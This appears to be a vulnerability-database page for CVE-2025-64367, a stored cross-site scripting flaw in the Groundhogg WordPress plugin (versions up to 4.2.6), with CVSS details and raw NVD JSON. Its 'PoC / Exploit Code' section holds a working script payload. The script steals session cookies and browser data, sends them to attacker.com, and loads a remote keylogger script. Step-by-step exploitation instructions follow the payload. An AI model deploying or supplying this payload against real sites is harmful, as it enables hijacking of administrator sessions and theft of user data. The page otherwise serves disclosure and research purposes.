Security Vulnerability Report
CVE-2025-64367 CVSS 6.5 MEDIUM

Published: 2025-10-31 12:15:37
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Adrian Tobey Groundhogg groundhogg allows Stored XSS. This issue affects Groundhogg: from n/a through <= 4.2.6.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Groundhogg <= 4.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-64367 Groundhogg Stored XSS PoC -->
<!-- This PoC demonstrates the stored XSS vulnerability in Groundhogg plugin -->

<!-- Attack Payload - Stored XSS -->
<script>
  // Steal admin cookies/session
  var cookies = document.cookie;
  fetch('https://attacker.com/steal?c=' + btoa(cookies), {
    method: 'POST',
    mode: 'no-cors'
  });

  // Alternative payload - DOM based XSS exfiltration
  var sessionData = {
    url: window.location.href,
    cookies: cookies,
    userAgent: navigator.userAgent,
    referrer: document.referrer
  };

  // Send stolen data to attacker controlled endpoint
  new Image().src = 'https://attacker.com/log?data=' + encodeURIComponent(JSON.stringify(sessionData));
</script>

<!-- XSS Payload with keylogger functionality -->
<script src='https://attacker.com/xss.js'></script>

<!--
Practical exploitation steps:
1. Identify Groundhogg plugin version <= 4.2.6
2. Find input fields that are not properly sanitized
3. Inject the XSS payload into the vulnerable field
4. Wait for admin or other privileged user to view the page
5. Execute malicious JavaScript in their browser context
-->

<!-- Mitigation: Update to Groundhogg > 4.2.6 and implement input validation -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64367", "sourceIdentifier": "[email protected]", "published": "2025-10-31T12:15:37.440", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Adrian Tobey Groundhogg groundhogg allows Stored XSS.This issue affects Groundhogg: from n/a through <= 4.2.6."}, {"lang": "es", "value": "Neutralización incorrecta de la entrada durante la generación de páginas web ('cross-site scripting') vulnerabilidad en Adrian Tobey Groundhogg groundhogg permite XSS Almacenado. Este problema afecta a Groundhogg: desde n/a hasta menor igual que 4.2.6."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/groundhogg/vulnerability/wordpress-groundhogg-plugin-4-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}